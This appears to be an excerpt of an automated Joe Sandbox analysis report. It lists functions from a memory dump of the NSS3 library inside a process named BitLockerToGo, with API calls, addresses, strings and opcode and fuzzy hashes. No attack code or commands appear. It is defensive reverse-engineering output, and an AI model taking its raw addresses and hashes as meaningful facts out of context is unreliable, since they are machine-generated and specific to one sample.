                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2de8b6fc1779ad735127e460cecd4d97a8d809f92ebc16f55ca6fff6c94c5f6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E341E774B04205AFDF00EFA8CE49B8A7BF8BB4A355F900138E919A7740DF319925C769
                                                                                                                                                                                                                                                                                                                                                          Function 6C75C8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000020), ref: 6C75C8B9
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C75C8DA
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000001), ref: 6C75C8E4
                                                                                                                                                                                                                                                                                                                                                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C75C8F8
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C75C909
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000), ref: 6C75C918
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000), ref: 6C75C92A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_GetPageSize.NSS3(6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F1B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C630F00: PR_NewLogModule.NSS3(clock,6C630936,FFFFE8AE,?,6C5C16B7,00000000,?,6C630936,00000000,?,6C5C204A), ref: 6C630F25
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C75C947
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2931242645-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f86060e473ca9e37463cbbe2812145942256ce7b741a70b2af025e5a47db4e8c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 54051626b9d9795af0ac21ead5922a520eaf220961c0943c409186c0974194cc
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f86060e473ca9e37463cbbe2812145942256ce7b741a70b2af025e5a47db4e8c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC21F9F1A003025BEB106F799D0965B7AB8FF0525AF440538E85BC2B00EF35E524CBA6
                                                                                                                                                                                                                                                                                                                                                          Function 6C63AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C63AF47
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C7090C9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: EnterCriticalSection.KERNEL32 ref: 6C7090E5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: TlsGetValue.KERNEL32 ref: 6C709116
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709090: LeaveCriticalSection.KERNEL32 ref: 6C70913F
                                                                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 6C63AF6D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C63AFA4
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C63AFAA
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C63AFB5
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C63AFF5
                                                                                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C63B005
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C63B014
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C63B028
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C63B03C
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s decr => %d$Unloaded library %s
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4015679603-2877805755
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 57502dfa91bb1d9035a05f57724716e989ac377a38e43f8794ee32697e33f1fe
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c31cfdf4664149b76b0003575d934d51cb688894ddca16f9bdecd5bb77ecf4eb
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57502dfa91bb1d9035a05f57724716e989ac377a38e43f8794ee32697e33f1fe
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB313BF5B04020ABEF019FE5EC44A4AB7B5EF45318B146239E81D87A01F732E824D7E9
                                                                                                                                                                                                                                                                                                                                                          Function 6C686C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C68781D,00000000,6C67BE2C,?,6C686B1D,?,?,?,?,00000000,00000000,6C68781D), ref: 6C686C40
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C68781D,?,6C67BE2C,?), ref: 6C686C58
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C68781D), ref: 6C686C6F
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C686C84
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C686C96
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: TlsGetValue.KERNEL32(00000040,?,6C63116C,NSPR_LOG_MODULES), ref: 6C631267
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: EnterCriticalSection.KERNEL32(?,?,?,6C63116C,NSPR_LOG_MODULES), ref: 6C63127C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C63116C,NSPR_LOG_MODULES), ref: 6C631291
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: PR_Unlock.NSS3(?,?,?,?,6C63116C,NSPR_LOG_MODULES), ref: 6C6312A0
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C686CAA
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2393066f29436eb372306b08d2c21975603272b457f339b39e0d0f7e3e20bb53
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cfd0c420b325da5d22fa1474a96d5f29e583c1bd2ac86f7207150646bc406583
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2393066f29436eb372306b08d2c21975603272b457f339b39e0d0f7e3e20bb53
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5901ADA170331127EE102B7B6E4AF66355C9F4225AF140531FF0AE0A81EFA6EA1580BD
                                                                                                                                                                                                                                                                                                                                                          Function 6C694E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetErrorText.NSS3(00000000,00000000,?,6C6578F8), ref: 6C694E6D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6309E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C6306A2,00000000,?), ref: 6C6309F8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6309E0: malloc.MOZGLUE(0000001F), ref: 6C630A18
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6309E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C630A33
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C6578F8), ref: 6C694ED9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C687703,?,00000000,00000000), ref: 6C685942
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C687703), ref: 6C685954
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C68596A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C685984
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C685999
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: free.MOZGLUE(00000000), ref: 6C6859BA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C6859D3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: free.MOZGLUE(00000000), ref: 6C6859F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C685A0A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: free.MOZGLUE(00000000), ref: 6C685A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C685920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C685A43
                                                                                                                                                                                                                                                                                                                                                          • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694EB3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C694820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C694EB8,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C69484C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C694820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C694EB8,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C69486D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C694820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C694EB8,?), ref: 6C694884
                                                                                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694EC0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C694470: TlsGetValue.KERNEL32(00000000,?,6C657296,00000000), ref: 6C694487
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C694470: EnterCriticalSection.KERNEL32(?,?,?,6C657296,00000000), ref: 6C6944A0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C694470: PR_Unlock.NSS3(?,?,?,?,6C657296,00000000), ref: 6C6944BB
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694F16
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694F2E
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694F40
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694F6C
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694F80
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C694F8F
                                                                                                                                                                                                                                                                                                                                                          • PK11_UpdateSlotAttribute.NSS3(?,6C76DCB0,00000000), ref: 6C694FFE
                                                                                                                                                                                                                                                                                                                                                          • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C69501F
                                                                                                                                                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C6578F8), ref: 6C69506B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 560490210-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 591234aeeb71a7725d85b0a0a89bd34064f43f4fb371b08eb235038c33b68e95
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4a2e14664d698cc72935207e6d96659c0daa9f32e9b67013db67610d70253acf
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 591234aeeb71a7725d85b0a0a89bd34064f43f4fb371b08eb235038c33b68e95
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF51F3B19012039FEB019F64EC05AAB36B4FF0635DF140635EC1A86A11FB31D955CBAA
                                                                                                                                                                                                                                                                                                                                                          Function 6C63ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 786543732-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d4159cd6c072b4721645132e5860f6edb97ffe4ef8bb33360db7a678a6c78f2c
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c2a097277f251b7e808e43ea65105ee5b95255fb97debdda1b3b96584e152c90
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4159cd6c072b4721645132e5860f6edb97ffe4ef8bb33360db7a678a6c78f2c
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9251AEB0E01125DBEF01DFE8DC456AEB7B4FB06349F142135D808A3A52D731A946EBDA
                                                                                                                                                                                                                                                                                                                                                          Function 6C714C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C714CAF
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C714CFD
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C714D44
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2274617401-4033235608
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9605cc35733491a4658ddc12778619277b4bba07995a9a4d88c2ebc372910879
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ec0228566c1e2dcee87e9b2ff3cedb05c6bd039304a38475dc909635c60a5754
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9605cc35733491a4658ddc12778619277b4bba07995a9a4d88c2ebc372910879
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 953166B3A0C915A7DB084E28AB127E573617B8331CF1D0539D5644BF14DB61AC22A7E6
                                                                                                                                                                                                                                                                                                                                                          Function 6C644880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6448A2
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C6448C4
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6C6448D8
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6C6448FB
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6C644908
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C644947
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C64496C
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C644988
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C768DAC,?), ref: 6C6449DE
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6449FD
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C644ACB
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4201528089-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6c7668674b55a000d79a40f4aba3b891c816b3d0c7a1866e46c5af281caae443
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e805b86ea1d2f344a50469733975fa29a26a78efa47efa68fe0b114ac9c8b23b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c7668674b55a000d79a40f4aba3b891c816b3d0c7a1866e46c5af281caae443
